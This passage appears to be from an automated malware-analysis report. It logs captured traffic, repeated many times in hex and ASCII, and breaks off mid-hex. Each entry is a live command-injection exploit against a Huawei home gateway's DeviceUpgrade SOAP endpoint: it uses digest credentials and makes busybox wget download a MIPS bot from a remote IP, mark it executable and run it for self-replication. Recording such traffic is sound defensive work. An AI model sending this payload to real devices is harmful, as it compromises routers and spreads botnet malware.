2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 